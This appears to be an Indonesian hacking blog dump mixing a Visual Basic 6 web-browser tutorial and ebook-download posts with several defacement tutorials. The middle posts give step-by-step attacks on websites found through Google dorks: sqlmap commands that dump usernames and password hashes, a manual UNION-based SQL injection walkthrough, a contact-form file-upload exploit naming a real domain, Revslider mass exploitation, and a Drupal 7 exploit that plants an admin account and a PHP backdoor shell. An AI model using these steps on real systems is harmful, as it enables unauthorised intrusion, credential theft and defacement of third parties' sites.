0

MEMBUAT WEB BROWSER DENGAN VB 6.0

Sabtu, 06 Februari 2016
Hai gan! Kali ini ane akan menjelaskan cara membuat sebuah web browser sendiri menggunakan Visual Basic 6. Ini hanya simple ya, jangan berharap akan menjadi seperti google chrome dan mozilla ahaha. Oke kita mulai aja sekarang.
Yang Kita Butuhkan:
Visual Basic 6
Cara Membuat:
1. Buka Visual Basic 6 nya. Trus pilih Standard EXE.
2. Klik Kanan Pada ToolBox, Kemudian pilih Components atau tekan  key Ctrl + T .
3. Kemudian Centang Microsoft html object library, Microsoft internet controls, Microsoft Windows common Controls 5.0 atau 6.0 sama saja.
4. Buat 5 Command Buton, 1 Text Box , 1Label, 1 Webbrowser , 1 Proggress Bar. Saran saya tata Seperti Gambar di bawah.

CommandButton Captionnya saya ganti dengan Back, Forward, Refresh, Stop dan Go.
Label caption saya ubah jadi done. Text box biarkan saja.

Sekarang Masukkan Kode berikut
Caranya: Double klik pada tool yang sudah kita buat
 
1. Back
On Error Resume Next
WebBrowser1.GoBack
 
2. Foward
 On Error Resume Next
WebBrowser1.GoForward
 
3. Refresh
On Error Resume Next
WebBrowser1.Refresh
 
4. Stop
On Error Resume Next
WebBrowser1.Stop
 
5. Go
On Error Resume Next
WebBrowser1.Navigate Text1.Text
 
6. Progress Bar, langsung copy ke form code
 
Private Sub WebBrowser1_ProgressChange(ByVal Progress As Long, ByVal ProgressMax As Long)
On Error Resume Next
If Progress = -1 Then ProgressBar1.Value = 100
Label1.Caption = "Done"
ProgressBar1.Visible = False
If Progress > 0 And ProgressMax > 0 Then
ProgressBar1.Visible = True
Image1.Visible = False
ProgressBar1.Value = Progress * 100 / ProgressMax
Label1.Caption = "Loading " & Int(Progress * 100 / ProgressMax) & "%"
End If
Exit Sub
End Sub
 
 7. Resize form, langsung copy ke form code
 
Private Sub Form_Resize()
On Error Resume Next
WebBrowser1.Width = Me.ScaleWidth
WebBrowser1.Height = Me.ScaleHeight - 1680
End Sub
 
8. Pastikan
Pastikan sudah tak ada eror, kalo ada silahkan bertanya lewat komentar

9. Make project1.exe
Tuntas deh

SUCCES JONS :'V
 
 
 
 
 
 
0

Ebook Visual Basic 6.0



I. Pengertian

     Visual basic 6.0 adalah salah satu aplikasi untuk membuat system informasi database. Visual basic 6.0 ini adalah terusan dari visual basic 1 sampai 5. walau agak tertinggal, tapi aplikasi software ini masih digunakan untuk pengimplementaisannya di dalam pembuatan sistem database. Visual basic 6.0 ini pun berkembang menjadi visual studio, visual basic 2008 sampai visual basic. net.
    Visual basic 6.0 ini sering juga di gunakan dalam perhitungan gaji, penjualan barang dan lain-lain. visual basic ini support dengan operating sistem windows. dan untuk databasenya bisa menggunakan microsoft access, SQL server dan oracle.

EBOOK LENGKAP BAHASA INDONESIA : SEDOT 
1

Tutorial sql injection menggunakan sqlmap

Hello,.. ^_^

hanya sekedar ingin berbagi ilmu, kali ini saya mau share tentang sqli otomatis menggunakan sqlmap di windows.
sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.

ok, langsung saja download dulu alat perang nya :

-python 2.7
-sqlmap-0.9.zip

untuk tutorialnya :

1. download kedua file di atas, instal python, extrack sqlmap nya
    (misalkan saya extrack di C:\Python27\tool\sqlmap)

2. cari website yg vuln terhadap sqli, (untuk dork bisa lihat di sini)
    ok, saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di om google
 
3. buka cmd (haruskah daku memberitahu caranya -_- )
    setelah itu ketik di cmd "cd [direktori sqlmap tadi yg anda extract]" lalu enter,..
    misalnya di sini direktori saya  >> C:\Python27\tool\sqlmap
    jadi seperti ini : 

     4. setelah itu masukan perintah :  "sqlmap.py -u https://www.target.com/index.php?id=7 --dbs" tanpa tanda petik lalu enter,..                          
         *yang berwarna biru ganti dengan url target mu
         *perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.

         maka hasilnya akan seperti ini :


 jika muncul pertanyan sejenis atau serupa/sebentuk dan seperti ini
 "GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter

kita telah mendapatkan nama databasenya yaitu :
           1.*yang saya sensor(dalam hal ini kita namakan saja db_xxx)
           2. information_schema

5. setelah itu saat nya kita bongkar isinya , tapi database yang mana ? hmm,...
    sepertinya saya tertarik dengan yang db_xxx , kenapa hayoo ?  feeling aja :p

lalu kita masukan perintah ini :

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx --tables [enter]
* yang warna biru url target
* yang warna hijau nama database yang mau di bongkar

fungsi :
           -u = url
          -D = database
   --tables = untuk mendapatkan tables dari database

maka hasilnya seperti ini :



wuihh muncul tablenya xD
[11 tables]
+-------------------+
| areas                      |
| categories               |
| featured                  |
| fields                      |
| jobfields                 |
| member_areas        |
| member_categories |
| member_fields        |
| members                |
| projects                  |
| users                      |
+-------------------+

6. sekarang kita lihat dari tabel2 tersebut kira kira user dimna ? , mungkin di tabel user :v
    mari kita check dengan perintah:

    sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users --columns [enter]
    * yang warna merah, nama tabel yang ingin dilihat columnnya

    fungsi :
               -T = nama table
   --columns  = melihat columns di table

maka hasilnya akan seperti ini :


kita telah mendapat kan nama column dari tabel users

7. sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi dari column password dan username saja, dengan memasukan perintah :

sqlmap.py -u https://www.target.com/index.php?id=7 -D db_xxx -T users -C password,username --dump
*yang warna pink, nama column yang ingin dilihat datanya

fungsi :
          -C =  nama column
   --dump =  melihat data di column

maka hasilnya seperti ini :

dan tadaaa,... \(^_^)/
kita dapet username ama passwordnya(password masih dalam bentuk hash, untuk tipe2 hash bisa lihatdi sini)

sekarang tinggal ngecrack passwordnya terus cari admin loginnya >> tebass 3:)


saya tidak bertanggung jawab atas apa yang anda lakukan, ini hanya untuk materi pembelajaran saja

Semoga bermanfaat, terima kasih ^_^
 
0

Deface Website Dengan metode Com_Sexy

Bahan:
Shell : Cari di gogle banyak :p 
Dork : inurl:/com_sexycontactform/ site:id <<--- bisa diganti contoh: .com.br, co.uk , .il ,.net dll
Exploit : components/com_sexycontactform/fileupload/index.php 

Langkah" : 

1.masukkan dork ke google lalu cari target ..
2.lalu untuk mengecheck itu vuln atau tidak bisa dengan cara memasukkan exploit dibelakang url target
contoh: www.maltvault.com.sg/components/com_sexycontactform/fileupload/index.php lalu enter :D

3.kalo ada tulisan file [] atau semacam nya bla bla itu VULn bisa dideface :D Lihat gambar dibawah 
Vuln:


4.kalo error / not found atau kembali ke halaman awal itu gak Vuln .
5.lalu setelah mendapat yg vuln, siapkan exploit truss save dengan menggukan Html :D
copy code ini CSRF ini  :


<form method="POST" action="http://
www.maltvault.com.sg/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form> 
Lihat Gambar : 


6.Setelah itu kalian tinggal panggil deh shell kalian sama kayak saya di bawah ini :)  



selesai jons :'v



0

Cara deface dengan Revslider Ajax


Oke langsung saja ya

Bahan-bahan :
-Xampp
-Exploit
-List Target
-Dork : inurl:/wp-content/plugins/revslider/

Langkah-langkah :

1.Kalau kalian udah download Xampp nya tinggal kalian copas exploitnya ke nitepad
dengan ekstensi php contoh : exploit.php 
 
2.Lalu kemudian kalian mencari list target nya dengan Dork di atas...Kemudian kalian
Save dengan ekstensi txt contoh : listtarget.txt
 
3.Exploit sama list target nya itu simpan satu folder di dir " C:\xampp\php "

4.Kalau sudah kalian tinggal buka cmd ketikkan " cd C:\xampp\php " << tanpa tanda kutip
Kalau udah tinggal tinggal kalian enter :)

5.Nah setelah kalian tekan enter dengan perintah di step ke 4 kalian ketikkan lagi " php namaexploit listtarget.txt " Contoh " php 78.php list.txt " << Lalu enter dan dia akan scan web" nya itu nah sambil menunggu kalian FB" an aja dulu :v

6.Kalau prosesnya selesai cek di folder " C:\xampp\php " cari perintah " Finish.txt "
lalu cek deh satu-satu persatu ^_^ contoh dia seperti ini kalau saya tahu " localhost/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css "



0

Cara deface dengan Reverse IP

teknik ke 1 :
1.Pergi ke Sini dulu biar tamvan :)
2.Isi kolom dengan website target tanpa "http://" dan "/" << tanpa tanda kutip :) lalu klik tombol check atau bisa lihat gambar

 3.Setelah anda klik Check maka akan muncul beberapa domain dan saya cuman mendapatkan 6 domain dari satu server :) atau lihat gambar

4.Kemudian kita pergi ke Bing.com
5.Tulis di google pencarian dengan dork di bawah ini : IP:00000 (IP yg ada di atas itu di ganti dengan milik kamu) Dork 

Contoh : IP:142.4.15.223 .Php?id=10

Note : Dork kalian bisa ubah sesuai keinginan anda sendiri dan yg IP tidak bisa anda ubah harus sesuai gambar di atas 

Nah untuk itu saya mendapatkan beberapa target dengan menggunakan dork yg ada di atas tadi (Lihat Gambar)

6.Kalau sudah ketemu tinggal di eksekusi deh entah itu dengan sql ata lokomedia terserah ente :)

Teknik 2 :
1.Tentukan target anda :)
2.Scan Ip nya dengan cmd dengan perintah berikut : ping www.target,com
3.Cara selanjutnya sama seperti cara ke 1 dari nomor 4 sampai seterusnya
Setelah dapet salah satu website tinggal kalian akalin aja , entah dengan sql injection atau itu pun dengan lokomedia

Sekian tutor saya ini terima Kasih :)

Dan bagi kalian yg kurang paham bisa langsung berkomentar di bawah saja :)

Salam Hacking ^_^
0

Cara deface dengan Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Jumat, 05 Februari 2016
1. Drupal Exploiter : SEDOT
2. C99 Shel : SEDOT

"Biasanya akan berhasil jika menggunakan shell c99"

Langkah-Langkah
-------------------
1. Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost


1. Google dork;

intext:"powered by drupal" site:id   atau inurl:"node/add/article" site:id

2. Masukkan target dan tekan tombol "suck it ! " (jika berhasil penampakannya seperti dibawah ini)

3. Masuk ke url  http://site.com/user/login 
dan masukkan
user : fuckyou
pass : admin

 4. Lalu masuk ke http://site.com/node/add/article  
masukkan source backdoor nya dan Ubah format nya ke PHP Code  )

lalu scroll kebawah dan klik Save
Dan anda akan langsung di direct ke shell anda

setelah itu terserah anda..
SUCCES JONS :'V
0

DEFACE DENGAN SQLI MANUAL

1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
 
Contoh:
www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.

0

BELAJAR BAHASA PEMOGRAMAN C++



Hai member pecinta gratisan. :D
Hari ini saya mau berbagi ebook nih, kumpulan ebook gratis tentang belajar bahasa pemrograman C++, kebetulan di sekolah saya menggunakan bahasa ini sebagai bahasa pemrograman yang digunakan.

Nah, C++ itu apa?
Bagi yang belum tahu C++ merupakan salah satu bahasa pemrograman yang ada didunia komputer. Bahasa C++ merupakan pengembangan dari bahasa C.
Berbeda dari pendahulunya C++ memiliki sifat pemrograman berorintasi obyek. Pada awalnya bahasa C++ disebut "a better than C", Bahasa C++ ditemukan oleh Bjarne Stroustrup.

Nah, sekarang apa itu bahasa pemrograman?
Bahasa pemrograman merupakan sekumpulan code yang digunakan agar manusia dapat berkomunikasi dengan komputer, karena komputer nggak mengerti bahasa manusia. Jika diibaratkan misalnya kita bertemu orang jepang sementara kita tidak bisa berbahasa jepang, si jepang juga nggak ngerti bahasa Indonesia. Maka kita ambil jalan tengah yaitu kita pake bahasa Inggris. Biar sama-sama ngerti Gitu. :D

Download Ebooknya :

ebook pertama : SEDOT

ebook kedua : SEDOT

ebook ketiga : SEDOT

ebook keempat : SEDOT